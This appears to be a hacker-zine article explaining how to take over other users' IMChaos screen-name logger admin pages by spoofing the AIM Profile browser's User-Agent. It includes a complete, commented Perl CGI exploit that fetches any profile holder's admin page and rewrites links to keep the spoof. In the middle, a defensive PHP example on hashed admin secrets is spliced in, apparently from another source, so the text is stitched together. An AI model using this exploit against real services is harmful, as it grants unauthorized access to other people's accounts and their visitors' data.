Exploiting AIM Screen Name Loggers

by Stik

As an AOL Instant Messenger user, you are probably familiar with IMChaos.com, the site known for its unique screen name loggers.

To make and use your own, you choose what type of logger you want from their site: Simple List, Profile Pic, Spy Survey... all of the offered options will work.  You fill out the required forms, then copy and paste your personally generated hyperlink into your profile.  Your friends will see the link in your profile, click it, and it will add their screen name to the list of others who clicked the link.

On older IMChaos loggers, you were able to gain admin access by copying the hyperlink URL from the AIM Profile window, pasting it into your browser's address bar, and replacing your screen name in the URL with the profile holder's screen name.  With admin access you can delete, edit, and view detailed info about the visitors.

Once this technique stopped working, I started to think about what the problem could be and what they could have changed to prevent this from functioning.  I knew it still worked in the AIM Profile window, but not in Internet Explorer or any other browser I tried.

I used a small Perl CGI script to dump the environment variables the web server sets from the current browser's request, so I could compare the results from Internet Explorer with those from the AIM Profile window.

#!/usr/bin/perl
##
##  printenv -- demo CGI program which just prints its environment
##
print "Content-type: text/plain\n\n";
foreach $var (sort(keys(%ENV))) {
    $val = $ENV{$var};
    $val =~ s|\n|\\n|g;
    $val =~ s|"|\\"|g;
    print "${var}=\"${val}\"\n";
}

I then noticed the difference in the User-Agent strings and came to the conclusion that the PHP script they use on their site must have a line of code that looks something like this:

<?php
$ua = $_SERVER['HTTP_USER_AGENT'];

if ($ua == "AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)") {
  // they are using AIM and everything should work
}
else {
  // they aren't using AIM so the screen name will not be added
}
?>
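As an added example (not code from the article or from IMChaos), here is the check inferred above beside a form of admin authorization that does not rely on anything the client can supply: the owner receives a random secret once and only its hash is stored, so neither the User-Agent header nor the screen name in the public link proves anything.  The `lists` table, its columns, and the screen name `listowner` are constructed for the demo, which assumes PHP with the pdo_sqlite extension.

```php
<?php
declare(strict_types=1);

// Weak check, as the article infers the site's script worked. Both the
// User-Agent header and the screen name in the query string come from the
// client, so one forged request satisfies it. Do not use this as authorization.
function is_admin_weak(array $server, array $query, string $owner): bool
{
    $ua = $server['HTTP_USER_AGENT'] ?? '';
    return $ua === 'AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)'
        && ($query['a'] ?? '') === $owner;
}

// Hardened check: when a list is created the owner is shown a random secret
// once, and only its hash is stored. The public profile link never carries
// it, and no request header is treated as proof of identity.
function create_list(PDO $db, string $owner): string
{
    $secret = bin2hex(random_bytes(32));
    $stmt = $db->prepare('INSERT INTO lists (owner, admin_hash) VALUES (?, ?)');
    $stmt->execute([$owner, password_hash($secret, PASSWORD_DEFAULT)]);
    return $secret;
}

function is_admin_strong(PDO $db, string $owner, string $presented): bool
{
    $stmt = $db->prepare('SELECT admin_hash FROM lists WHERE owner = ?');
    $stmt->execute([$owner]);
    $hash = $stmt->fetchColumn();
    // password_verify() compares in constant time and rejects unknown owners
    // (fetchColumn() returns false when no row matched).
    return is_string($hash) && password_verify($presented, $hash);
}

// Constructed demo: in-memory SQLite with a hypothetical "lists" table.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE lists (owner TEXT PRIMARY KEY, admin_hash TEXT NOT NULL)');

$forgedRequest = ['HTTP_USER_AGENT' => 'AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)'];
var_dump(is_admin_weak($forgedRequest, ['a' => 'listowner'], 'listowner'));

$secret = create_list($db, 'listowner');
var_dump(is_admin_strong($db, 'listowner', $secret));
var_dump(is_admin_strong($db, 'listowner', 'listowner'));  // knowing the screen name is not enough
var_dump(is_admin_strong($db, 'someone-else', $secret));
```

The same principle applies to any client-supplied header (Referer, X-Forwarded-For, cookies without a server-side session): they can be logged and used for analytics, but never as the sole gate on an admin page.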

I decided to test my theory by writing a Perl script to spoof the AIM Profile window, emulating the AIM Profile browser by sending its User-Agent string when requesting the admin page.

Just as I thought, the site only works properly for the AIM Profile browser, and now, any browser using my script.

My code is listed below.  I commented it heavily for this article so you can understand what is going on.  If you decide to try to run this code, make sure it is on a machine supporting Perl/CGI with the modules HTTP::Request and LWP::UserAgent installed (which are easily obtained for free at cpan.org if you do not have them).  Once you become comfortable with the code, feel free to add on to it and make it better.

#!/usr/bin/perl
##  IMChaos.cgi
##  Exploit to gain admin access to any IMChaos account
##  Spoofs the AIM Browser Window
##  Written by: Stik
use strict;
use warnings;
use HTTP::Request;
use LWP::UserAgent;
  ##  Includes the above modules to be used in the script
print "Content-type: text/html\n\n";
  ##  To output as an HTML page, this is necessary
my $agent = 'AIM/30 (Mozilla 1.24b; Windows; I; 32-bit)';
  ##  User-Agent string of the AIM window
my $tmp = $ENV{'QUERY_STRING'} || "";
  ##  URL of the hyperlink clicked, blank if no hyperlink was clicked
if ($tmp ne "") {
  ##  The following keeps the browser spoofed when hyperlinks are clicked
  $tmp =~ s/link=//g;
    ##  Removes the word "link=" from the URL of the clicked hyperlink
  my $listurl1 = $tmp;
    ##  URL of the clicked hyperlink
  my $ua = LWP::UserAgent->new(agent => $agent, env_proxy => 1);
    ##  Send the AIM Profile User-Agent instead of the current browser's
  my $request = HTTP::Request->new(GET => $listurl1);
  my $content = $ua->request($request)->content;
    ##  Request the HTML of $listurl1, the clicked hyperlinked page
  print "$content<br>";
    ##  Display the page as it would be seen in the AIM window
} else {
  ##  The normal spoofed page, before any hyperlinks are clicked
  my $listurl = 'http://dilutedweb.com/m.php?a=AdminScreenName&b=SETOFLETTERS';
    ##  $listurl MUST be the hyperlink URL with the profile holder's SN in place of yours
  my $ua = LWP::UserAgent->new(agent => $agent, env_proxy => 1);
    ##  Send the AIM Profile User-Agent instead of the current browser's
  my $request = HTTP::Request->new(GET => $listurl);
  my $content = $ua->request($request)->content;
    ##  Request the HTML of $listurl, the admin IMChaos page
  $content =~ s/href="/href="IMChaos.cgi?link=/g;
    ##  Rewrite every link to go back through this script, so the browser stays spoofed as AIM
  print "$content<br>";
    ##  Display the page as it would be seen in the AIM window
}

Code: imchaos.cgi
